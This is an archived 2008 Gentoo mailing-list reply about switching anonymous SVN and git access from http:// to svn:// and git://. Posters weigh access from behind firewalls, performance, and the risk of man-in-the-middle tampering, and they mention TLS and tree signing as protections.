On Friday 18 January 2008, Robin H. Johnson wrote: > On Sat, Jan 19, 2008 at 12:26:44AM +0200, Alon Bar-Lev wrote: > > On 1/18/08, Mike Frysinger <[EMAIL PROTECTED]> wrote: > > > On Thursday 17 January 2008, Robin H. Johnson wrote: > > > > anonvcs.gentoo.org: anoncvs, anonsvn, anongit > > > > - Anonymous SVN is changing from http:// to svn:// [1] > > > > overlays.gentoo.org [3]: > > > > - Anonymous SVN is changing from http:// to svn:// > > > > > > i'd point out that http:// syncing is usable from behind firewalls > > > while svn:// is not ... while this does not affect me personally, it's > > > something to keep in mind. > > > -mike > > > > Just wanted to note this too... I am one of the affected ones... > > I think that it is very important to have http, and even https for > > formal resources. > > git://, svn://, rsync:// or ssh+X:// are inaccessible for a large > > group of users. > > My core concern with the SVN http://, was the crappy performance it > provided compared to svn://. The main rsync tree has never been > available for iterative syncing via http://, just had tarball snapshots > and deltas instead.
i'm not suggesting you *not* provide the proper svn:// and git:// ones. i'd always use those myself when possible (as performance is a ton better as ive seen many times). i'm suggesting we provide both and tell people to use svn:// and git://, but if you're behind a stupid firewall, there is also http:// available. > > Also using none secured protocols, exposes users to man-in-the-middle > > attacks. > > The existing http:// had this problem already, it's not a new one. > git:// and svn:// do both have patches around adding support for adding > TLS. This however just adds overhead, I really need to finish the > tree-signing work I was doing, as that protects the content better (MITM > is still possible on SSL without it, just a lot harder as an attacker > has to deal with the SSL stream first). using https:// to secure your data here is the wrong way to go. if you have a man-in-the-middle attacking you, they can do a lot more than inject crap into your syncs, some of which you wouldnt even notice. for the topic at hand, this topic does not matter i think. -mike
signature.asc
Description: This is a digitally signed message part.
